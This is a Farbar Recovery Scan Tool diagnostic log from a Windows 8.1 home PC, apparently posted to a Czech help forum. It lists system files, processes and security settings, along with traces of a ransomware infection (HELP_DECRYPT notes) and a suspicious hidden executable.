2015-08-26 21:58 - 2015-07-09 18:14 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-08-26 21:58 - 2015-07-03 23:51 - 01380056 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-08-26 21:58 - 2015-07-03 16:00 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-08-26 21:58 - 2015-06-27 13:47 - 00118616 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
2015-08-26 21:58 - 2015-06-19 19:07 - 02819072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 06521800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2015-08-26 21:58 - 2015-05-01 03:13 - 01488000 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-08-26 21:58 - 2015-05-01 03:13 - 00261376 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2015-08-26 21:57 - 2015-07-10 21:06 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2015-08-26 21:57 - 2015-06-10 00:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2015-08-26 21:57 - 2015-06-10 00:39 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2015-08-26 21:57 - 2015-06-10 00:38 - 01201664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2015-08-26 21:42 - 2014-04-16 01:35 - 00028352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aspnet_counters.dll
2015-08-26 21:42 - 2014-04-16 01:34 - 00029888 _____ (Microsoft Corporation) C:\WINDOWS\system32\aspnet_counters.dll
2015-08-26 21:31 - 2015-08-26 21:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-08-22 12:37 - 2015-08-22 12:46 - 407010384 _____ (Microsoft Corporation) C:\Users\tomas\Downloads\X12-30196.exe
2015-08-20 18:16 - 2015-08-11 03:20 - 25191936 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-08-20 18:16 - 2015-08-11 02:20 - 19871232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-08-18 20:02 - 2015-08-18 20:02 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\tomas\Downloads\SpyHunter-Installer.exe
2015-08-18 19:00 - 2015-08-18 19:00 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe (1).zip
2015-08-18 18:27 - 2015-08-18 18:27 - 06326224 _____ C:\Users\tomas\Downloads\KMSPico 10.0.8.exe.zip
2015-08-14 15:57 - 2015-08-14 15:57 - 00000222 _____ C:\Users\tomas\Desktop\Path of Exile.url
2015-08-14 15:02 - 2015-07-30 16:04 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-08-14 15:02 - 2015-07-30 15:48 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-08-14 14:34 - 2015-07-16 02:29 - 07458648 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-08-14 14:34 - 2015-07-16 02:29 - 01735000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-08-14 14:34 - 2015-07-16 02:29 - 00101720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mountmgr.sys
2015-08-14 14:34 - 2015-07-16 02:28 - 01499920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-08-14 14:34 - 2015-07-10 19:54 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2015-08-14 14:33 - 2015-07-19 03:58 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-08-14 14:33 - 2015-07-18 20:51 - 03704320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:31 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:29 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-08-14 14:33 - 2015-07-18 20:29 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-08-14 14:33 - 2015-07-18 20:28 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-08-14 14:33 - 2015-07-18 20:12 - 02228736 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-08-14 14:33 - 2015-07-18 20:10 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-08-14 14:33 - 2015-07-18 20:09 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-08-14 14:32 - 2015-07-16 22:36 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-08-14 14:32 - 2015-07-16 22:35 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-08-14 14:32 - 2015-07-16 22:26 - 05923328 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-08-14 14:32 - 2015-07-16 22:23 - 00615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-08-14 14:32 - 2015-07-16 22:21 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:53 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-08-14 14:32 - 2015-07-16 21:51 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-08-14 14:32 - 2015-07-16 21:50 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-08-14 14:32 - 2015-07-16 21:45 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-08-14 14:32 - 2015-07-16 21:45 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:41 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-08-14 14:32 - 2015-07-16 21:39 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-08-14 14:32 - 2015-07-16 21:38 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-08-14 14:32 - 2015-07-16 21:36 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:34 - 14451200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:32 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-08-14 14:32 - 2015-07-16 21:14 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 21:13 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-08-14 14:32 - 2015-07-16 21:12 - 02427904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-08-14 14:32 - 2015-07-16 21:10 - 12856832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-08-14 14:32 - 2015-07-16 21:06 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-08-14 14:32 - 2015-07-16 21:01 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:52 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-08-14 14:32 - 2015-07-16 20:49 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-08-14 14:32 - 2015-07-16 20:42 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-08-14 14:32 - 2015-07-16 20:38 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-08-14 14:32 - 2015-07-16 20:37 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-08-14 14:30 - 2015-07-29 01:24 - 00025776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-08-14 14:30 - 2015-07-28 16:24 - 01148416 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 01116160 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-08-14 14:30 - 2015-07-28 16:24 - 00069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-08-14 14:30 - 2015-07-07 11:40 - 00270168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00114520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-08-14 14:30 - 2015-07-07 11:40 - 00044560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-08-14 14:30 - 2015-07-02 00:19 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebClnt.dll
2015-08-14 14:30 - 2015-07-02 00:16 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\davclnt.dll
2015-08-14 14:30 - 2015-07-01 23:37 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebClnt.dll
2015-08-14 14:30 - 2015-07-01 23:35 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\davclnt.dll
2015-08-14 14:30 - 2015-06-12 19:03 - 18823680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2015-08-14 14:30 - 2015-06-12 18:36 - 15159296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2015-08-14 14:29 - 2015-07-29 16:37 - 01994752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-08-14 14:29 - 2015-07-29 16:30 - 01381888 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-08-14 14:29 - 2015-07-29 16:23 - 01559552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-08-14 14:29 - 2015-07-24 20:57 - 04177408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-08-14 14:29 - 2015-07-24 20:57 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-08-14 14:29 - 2015-07-24 20:52 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-08-14 14:29 - 2015-07-24 19:27 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-08-14 14:29 - 2015-07-24 19:23 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 01113944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-08-14 14:29 - 2015-07-14 23:59 - 00487256 _____ (Microsoft Corporation) C:\WINDOWS\system32\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 23:59 - 00393560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netcfgx.dll
2015-08-14 14:29 - 2015-07-14 05:22 - 02529880 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2015-08-14 14:29 - 2015-07-14 05:21 - 01901776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2015-08-14 14:29 - 2015-07-13 21:46 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2015-08-14 14:29 - 2015-07-13 21:45 - 00059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2015-08-14 14:29 - 2015-07-10 20:19 - 01101824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:42 - 02345472 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2015-08-14 14:29 - 2015-07-10 19:14 - 00856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdvidcrl.dll
2015-08-14 14:29 - 2015-07-10 19:13 - 07032320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2015-08-14 14:29 - 2015-07-10 18:47 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2015-08-14 14:29 - 2015-07-10 18:31 - 06213120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\notepad.exe
2015-08-14 14:29 - 2015-07-09 19:13 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\notepad.exe
2015-08-14 14:29 - 2015-07-09 18:30 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\notepad.exe
2015-08-14 14:29 - 2015-06-11 22:12 - 02476376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2015-08-14 14:29 - 2015-06-11 22:12 - 00428888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-09-08 19:04 - 2015-02-07 14:44 - 00198144 ___SH C:\Users\tomas\Desktop\Thumbs.db
2015-09-08 19:04 - 2015-02-05 20:07 - 00000000 ____D C:\WarThunder
2015-09-08 19:04 - 2014-12-22 18:54 - 00000000 ____D C:\Users\tomas
2015-09-08 19:02 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-09-08 19:01 - 2015-07-26 20:16 - 00000000 ____D C:\Users\tomas\Desktop\stul
2015-09-08 19:01 - 2015-04-11 23:09 - 00000000 ____D C:\Users\tomas\Documents\Data
2015-09-08 19:01 - 2015-01-16 19:52 - 00000000 ____D C:\Users\tomas\Documents\My Games
2015-09-08 18:58 - 2015-07-30 21:10 - 00000000 ____D C:\Users\tomas\Desktop\Nová složka
2015-09-08 18:57 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQM
2015-09-08 18:57 - 2014-12-22 20:37 - 00000000 ____D C:\Users\tomas\AppData\Roaming\Mozilla
2015-09-08 18:57 - 2014-12-22 19:25 - 00000000 ____D C:\Users\tomas\AppData\Roaming\uTorrent
2015-09-08 18:56 - 2014-12-22 21:24 - 00000000 ____D C:\Users\tomas\AppData\Roaming\ICQ-Profile
2015-09-08 18:53 - 2015-04-11 23:18 - 00000000 ____D C:\Users\tomas\AppData\Local\Skyrim
2015-09-08 18:53 - 2014-12-22 19:22 - 00000000 ____D C:\Users\tomas\AppData\Local\Google
2015-09-08 18:52 - 2015-05-16 23:13 - 00000000 ____D C:\Users\tomas\AppData\Local\Geckofx
2015-09-08 18:52 - 2015-01-20 21:18 - 00000000 ____D C:\Users\tomas\AppData\Local\DassaultSystemes
2015-09-06 18:05 - 2014-12-22 19:00 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-20688079-3506957125-3551254075-1001
2015-09-06 17:15 - 2015-05-06 22:18 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-06 16:55 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-09-06 16:49 - 2013-08-22 15:25 - 00000207 _____ C:\WINDOWS\win.ini
2015-09-06 16:25 - 2013-08-22 15:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2015-09-06 16:07 - 2014-12-22 19:16 - 00747334 _____ C:\WINDOWS\system32\perfh005.dat
2015-09-06 16:07 - 2014-12-22 19:16 - 00154558 _____ C:\WINDOWS\system32\perfc005.dat
2015-09-06 16:07 - 2014-03-18 12:04 - 01745984 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-09-05 10:33 - 2014-12-22 19:23 - 00002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-09-05 10:30 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-09-05 10:29 - 2015-07-22 19:26 - 00001950 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2015-08-29 03:21 - 2014-12-22 19:22 - 00003956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-08-29 03:21 - 2014-12-22 19:22 - 00003720 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-08-29 03:21 - 2014-12-22 19:22 - 00000984 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-08-29 03:21 - 2014-12-22 19:22 - 00000980 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-08-27 05:55 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache
2015-08-26 22:01 - 2013-08-22 17:20 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-08-15 08:20 - 2013-08-22 16:44 - 00500248 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-08-15 08:18 - 2015-01-07 22:00 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-08-15 08:13 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-08-14 15:03 - 2014-12-23 11:43 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2015-08-14 15:03 - 2014-12-23 11:39 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-08-14 15:02 - 2015-01-07 22:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-08-14 15:00 - 2014-12-22 21:09 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-08-14 14:54 - 2014-12-22 21:09 - 132483416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-08-14 14:48 - 2015-04-16 18:36 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-08-14 14:48 - 2014-12-23 12:51 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-08-14 14:48 - 2013-08-22 17:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
==================== Files in the root of some directories =======
2015-09-08 18:57 - 2015-09-08 18:57 - 0008628 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-08 18:57 - 2015-09-08 18:57 - 0045651 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.PNG
2015-09-08 18:57 - 2015-09-08 18:57 - 0004254 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-08 18:57 - 2015-09-08 18:57 - 0000292 _____ () C:\Users\tomas\AppData\Roaming\HELP_DECRYPT.URL
2015-09-08 18:53 - 2015-09-08 18:53 - 0008628 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.HTML
2015-09-08 18:53 - 2015-09-08 18:53 - 0045651 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.PNG
2015-09-08 18:53 - 2015-09-08 18:53 - 0004254 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.TXT
2015-09-08 18:53 - 2015-09-08 18:53 - 0000292 _____ () C:\Users\tomas\AppData\Local\HELP_DECRYPT.URL
2015-03-26 20:22 - 2015-03-26 20:22 - 0000000 ___SH () C:\Users\tomas\AppData\Local\LumaEmu
2014-12-23 03:11 - 2014-12-23 03:11 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-07-15 00:36 - 2015-06-15 23:16 - 0071680 ___SH (dswteyurtetuitr) C:\ProgramData\mscivosu.exe
Files to move or delete:
====================
C:\ProgramData\mscivosu.exe
Some files in TEMP:
====================
C:\Users\tomas\AppData\Local\Temp\avgnt.exe
C:\Users\tomas\AppData\Local\Temp\headhunter.dll
C:\Users\tomas\AppData\Local\Temp\laminator.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2015-09-02 19:11
==================== End of FRST.txt ============================
===***===***===***=== Extract of Additional scan result of Farbar Recovery Scan Tool ===***===***===***===
==================== Drive and Memory info ===================
Drive c: () (Fixed) (Total:194.97 GB) (Free:46.25 GB) NTFS
Drive d: () (Fixed) (Total:722.7 GB) (Free:705.56 GB) NTFS
Drive e: () (Fixed) (Total:13.49 GB) (Free:13.49 GB) FAT32
Available physical RAM: 5085.76 MB
Total physical RAM: 8075.43 MB
Percentage of memory in use: 37%
==================== MBR and Partition Table ==================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2BFB4DC8)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=195 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=722.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=13.5 GB) - (Type=0C)
==================== Scheduled Tasks (whitelisted) ==================
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Alternate Data Streams (whitelisted) ==================
==================== Security Center ==================
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
===***===***===***=== Supplementary Scan createdy by FRSTLauncher ===***===***===***===
Posledni aktualizace FRSTLauncheru: 25_11_2013 (01)
Posledni aktualizace Modifikacniho skriptu: 30_09_2013 (01)
***** Velikost "Plochy" *****
Velikost slozky "C:\Users\tomas\Desktop" je 260 MB.
***** Startup Programs *****
***** Firewall rules *****
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
EnableFirewall REG_DWORD 0x1
DisableNotifications REG_DWORD 0x0
DoNotAllowExceptions REG_DWORD 0x0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
***** System Restore *****
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"Generalize_DisableSR"=dword:00000000
==================== End Of Log ==============================
pripadne prikladam log ... : )
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-09-2015
Ran by tomas (administrator) on KRAKONOSOVO (08-09-2015 19:21:47)
Running from C:\Users\tomas\Desktop
Loaded Profiles: tomas (Available Profiles: tomas)
Platform: Windows 8.1 Pro (X64) Language: Angličtina (Spojené státy)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Dassault Systemes) C:\Program Files\Dassault Systemes\B20\win_b64\code\bin\CATSysDemon.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(@ByELDI) C:\Program Files\KMSpico\Service_KMS.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
